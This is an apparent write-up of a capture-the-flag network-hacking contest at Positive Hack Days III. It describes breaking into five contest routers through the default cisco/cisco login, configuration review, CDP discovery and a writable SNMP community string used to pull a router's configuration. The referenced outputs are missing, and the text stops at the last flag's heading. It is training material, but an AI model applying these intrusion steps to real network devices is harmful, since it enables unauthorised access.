During the Positive Hack Days III forum, the NetHack competition for experts in network security was held. The participants were to obtain access to five network devices and capture flags stored in the devices during 50 minutes. The game network included typical network infrastructure vulnerabilities discovered by the Positive Technologies experts during security analysis and penetration tests. Today we would like to bring to you attention a detailed review of the contest tasks.
To add a special appeal to the contest, the game infrastructure was prepared according to a legend. Here it is.
An equipment crash has occurred on a large hydroelectric power station, resulting in the loss of connection between the central Industrial Control System (ICS) and water discharge units. Ongoing showers in the nearby territories significantly increased water inflow to the storage pond. Specialists estimate that the pond will be overflown in fifty minutes, the water will pour over the dam flooding the city. To prevent the disaster, one should obtain access to the five faulty units and reconnect them to the central ICS, ensuring the possibility of opening emergency sluices.
The contest layout
The game infrastructure was built according to the following layout:
The participants were to get access to five network devices, find md5 flags left in their configuration and enter them into a form on a special web page. The participant who found and entered all five flags was awarded the first prize.
Obtaining the first flag
Entrance in R1 is easy, we just need to use the account \’cisco\’ with the password \’cisco\’. We get the first flag at once:
Obtaining the second flag
To obtain the second flag we need certain skills. The first thing we should do once we entered into the device is to look through configuration and neighboring devices in the network.
Obtaining the third flag
If we try to enter into Router3 using the account cisco/cisco, it won\’t work. Let\’s try to find the account we need. Taking another look at Router2 configuration. Now we see the following line:
Obtaining the fourth flag
It is the most difficult part. We enable cdp in the Fa0/1 interface and check the neighboring devices:
Then we try to enter into Router4 and find out that radius is used. We take a long look at Router3 configuration and see writable \’community string PHDays2013\’. After changing the routing, we can try to take Router4 configuration using snmp protocol.
Obtaining the last flag